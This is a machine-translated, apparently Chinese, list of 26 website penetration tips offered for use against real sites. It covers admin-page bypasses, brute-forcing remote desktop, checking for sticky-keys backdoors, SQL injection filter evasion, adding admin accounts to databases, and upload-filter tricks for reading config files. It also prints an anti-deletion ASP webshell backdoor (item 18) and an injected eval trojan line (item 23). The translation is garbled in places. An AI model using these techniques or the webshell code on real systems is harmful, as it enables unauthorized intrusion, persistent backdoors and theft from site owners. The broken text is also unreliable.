Website penetration techniques collection and summary

This article summarizes some frequently used website penetration techniques and hopes to help you.

1. Bypass background verification without strict website filtering, and add admin/session. asp or admin/left. asp to the website.

2. Some websites will have a script prompt box in the background. Enter "administrator" to break through! Admin indicates entering as an administrator.

3. some websites opened 3389. Before the intrusion, they first connected to 3389 and tried weak passwords or brute-force attacks. In addition, they pressed the shift key five times to see if there were backdoors installed by their predecessors and then the social engineering password.

4. sometimes in the background, a prompt box will pop up, "Please log in", copy the address (you cannot copy it), and place it in the web page Source Code Analyzer. Select browser-intercept jump check-view to go to the background!

5. Break through anti-Leech to access webshell. Code:

javascript：document.write("fuck")

Press enter and click GO to enter webshell.

6. break through the first-class information monitoring interception system access. When pony can access and upload a Trojan, You can first merge the Trojan with an image and upload the merged image, then you can back up the database and access it!

7. When using the editor's shell, sometimes asp | asa | cer | php | aspx and other extensions are filtered out for uploading. In fact, you only need to add aaspsp to upload asp.

8. sometimes, when you guess the table segment, but you cannot guess the field, you can go to the background to view the source file and search for the ID or type, then add the field in "ah d" to guess the content to break through.

9. This technique can be used for social engineering background passwords. If the website domain name is www.hx95.com and the Administrator name is hx95, you can try the passwords "hx95" and "www.hx95.com" to log in.

10. If the website filters and 1 = 1 and 1 = 2 during manual injection, you can use xor 1 = 1 xor 1 = 2 for determination.

11. Construct a Trojan horse to upload a sentence locally. If the prompt "select the file you want to upload first!" is displayed! [Re-upload] "indicates that the file is too small. Open it in notepad and copy a few more words to enlarge the file size and then upload the file. 12. Run the field name and pass phrase in the "ah d" Running table to display the length of 50 or more. If you can't guess it, You can generally run it when you go to pangolin!

13. tips for the Administrator background, admin/left. asp, admin/main. asp, admin/top. asp, admin/admin. asp displays the menu navigation, and thunder downloads all links.

14. Know the table name and field, and use the SQL statement to add a username and password statement to the ACCESS database:

 Insert into admin(user,pwd)values('test','test')

15. when the Administrator's password is obtained but the Administrator's account is not available, open a news article at the front-end and look for words such as "submitter" and "publisher, generally, the "submitter" is the administrator's account.

16. Blasting ASP + IIS set up the absolute web site path, assuming that the site home page is: http://www.xxxxx/index.asp/ submitted http://www.xxxxx.cn/fkbhvv.aspx/, fkbhvv.aspxis not existent.

17. with the use of source code, many websites use the source code downloaded from the Internet. Some webmasters are very lazy and don't change anything. Then they upload and activate the website. We can download one set, there is a lot of default information worth using.

18. upload the following code to webshell with the suffix asp. Even if someone else finds it, it cannot be deleted. This is a super anti-deletion Trojan. You can leave a backdoor safely, kitchen Knife connection password: x

 
 

  
  
<%Eval(Request(chr(120))):Set fso=CreateObject("Scripting.FileSystemObject"):Setf=fso.GetFile(Request.ServerVariables("PATH_TRANSLATED")):if  f.attributes<>3939then:f.attributes=39:endif%> 
 
 

19. when the password of the cracked account cannot be found in the background, you can try to connect to ftp. For example, if the domain name is www.baidu.com and the obtained password is "bishi ", we can try to use "xxxx" "xxxx.cn" www.xxxx.cn as the FTP user name, and "bishi": As the FTP password to log on. The chance of success of the Chinese Emy is very high! Default ftp port: 21 Default Account Password: test

20. Can I log on without the verification code displayed in the background? In fact, you can break through this dilemma by importing a piece of Code into the registry. Save the following Code as Code. reg and double-click the import!

1 2 3 REGEDIT4 [HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Internet Explorer \ Security] "BlockXBM" = dword: 00000000

21. When the website does not allow uploading files such as asp, asa, and php, we can upload an stm file with the code:

 
 

  
  
“<!--#include file=”conn.asp”-->” 
 
 

(If you want to view any file, write the file name. Here I suppose you want to view "conn. asp "),

Open the address of the stm file and check the source code. The code of the file "conn. asp" is displayed at a glance!

22. When the website is not allowed to upload files of ASP, CGI, CER, CDX, HTR and other types, try to upload a shtm file with the following content:

 
 

  
  
<!--#includ file="conn.asp"--> 
 
 

If the upload is successful, the access address will be able to browse the content in conn. asp. In this way, the database path will be ready!

23. "Your operations have been recorded!" is displayed in the manual detection injection point !" Access this file: sqlin. asp. If so, insert a trojan after the injection point:

‘excute(request(“TNT”))

Next, use a trojan client to connect to the: hacker.

24. If I am not paying attention to it, I must have selected a site that supports aspx. How can I determine the problem? The method is very simple. Add xxx. aspx after the website. If a server error in the "/" application is returned, the resource cannot be found. The image 404 shows that the aspx Trojan is supported.

25. You can view the version by adding test. php to the website.

26. The two website background files admin_index.asp manage_login.asp are forbidden